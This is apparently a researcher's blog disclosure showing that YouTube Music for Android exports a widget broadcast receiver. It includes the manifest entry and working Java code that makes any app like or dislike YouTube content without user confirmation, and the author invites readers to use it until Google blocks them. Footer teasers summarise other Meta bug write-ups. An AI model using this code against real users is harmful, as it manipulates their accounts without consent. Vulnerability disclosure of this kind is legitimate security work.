Youtube Music for Android: Like/dislike any video without user confirmation

By -

Hi!

Today I would like to post short tutorial about how your Android app may like/dislike any youtube video without user confirmation. [last check 14.02.2024]

Youtube Music for Android has exported PendingIntentReceiver defined in AndroidMafest.xml

        <receiver android:name="com.google.android.apps.youtube.music.player.widget.base.PendingIntentReceiver" android:exported="true">
            <intent-filter>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_play"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_pause"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_replay"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_retry"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_previous"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_next"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_dislike"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_like"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_launch_app"/>
                <action android:name="com.google.android.youtube.music.pendingintent.controller_widget_request_data"/>
            </intent-filter>
        </receiver>


If user watches/listens something in Youtube Music than it is possible to send "com.google.android.youtube.music.pendingintent.controller_widget_like" intent to like/dislike currently opened content.

We may launch Youtube Music with our url on any music/video and then send broadcast intent to like this content without user confirmation:



public void onLikeButtonClicked(final View view) {
    String url = mEditText.getText().toString();
    Intent songIntent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));

    final Intent likeIntent = new Intent("com.google.android.youtube.music.pendingintent.controller_widget_like");
    likeIntent.putExtra("widget_key", "111");
    likeIntent.setClassName("com.google.android.apps.youtube.music", "com.google.android.apps.youtube.music.player.widget.base.PendingIntentReceiver");

    mHandler.postDelayed(new Runnable() {
        @Override
        public void run() {
            sendBroadcast(likeIntent);
        }
    }, 3000);

    startActivity(songIntent);
}


Here is a simple code which likes "url" value. First we need to launch Youtube Music with that url and than we send broadcast to like this video.


This "feature" is not a security issue, so you may use it until you are not blocked by Google :))), because as I understand Google abuse mechanisms prevent such artificial suspicious video likes, that is why this was not fixed.

Initialy it was reported to Google Mobile Security Program: 01.12.2023 












After long discussion the issue was reopened and may be it will be fixed sometime:))

Popular posts from this blog

Facebook Messenger server random memory exposure through corrupted GIF image

By -
Image
Intro Year ago, in February 2018, I was testing Facebook Messenger for Android looking how it works with corrupted GIF images. I was inspired by Imagemagick "uninitialized memory disclosure in gif coder" bug and PoC called "gifoeb" (cool name for russian speakers). I found Messenger app only crashes with images generated by "gifoeb" tool with Nullpointer dereferrence (Facebook did't awarded bounty for DoS in Facebook Messenger for Android). Ok. I thought: what is GIF image format and how it looks, how I can generate my own image? (spoiler: 10K$ bug in Facebook Messenger for Web, but theory first)
Read more

React debug.keystore key was trusted by Meta(Facebook) which caused to Instagram account takeover by malicious apps.

By -
Image
  App Signing All Android applications should be signed with keys generated by app developers ( https://source.android.com/security/apksigning ). When application signed with specific key we can verify that this app was not modified by thirdparty. Also it is possible to communicate between apps (IPC) and verify app identity by it key signature. If caller app has verified signature than we can allow it to do some restricted actions, for example we can return some confidential information to it like user information. This keys should be confidential and not be exposed outside. Bug Description I played with Facebook Sdk for Android and noticed one thing. This api call is not validates package name when you authorize your client_id ``` https://m.facebook.com/dialog/oauth?android_key= Xo8WBi6jzSxKDVR4drqm84yr9iU &calling_package_key=com.vulnano.android.facebook.sdkat&client_id=124024574287414&display=touch&facebook_sdk_version=8.1.0&redirect_uri=fbconnect%3A%2F%2Fsuccess
Read more

Meta Quest: Attacker could make any Oculus user to follow (subscribe) him without any approval

By -
Image
Description Attacker was able to subscribe any Oculus user on attacker's Oculus account without user approval. So it was possible to make very attractive account with a lot of real followers without their approval:). This followers are displayed in Oculus Quest device when you open user profile, also in profile opened in Meta Quest for Android and some other places. Bug details  This page https://secure.oculus.com/my/people/   displays Oculus user followers:  
Read more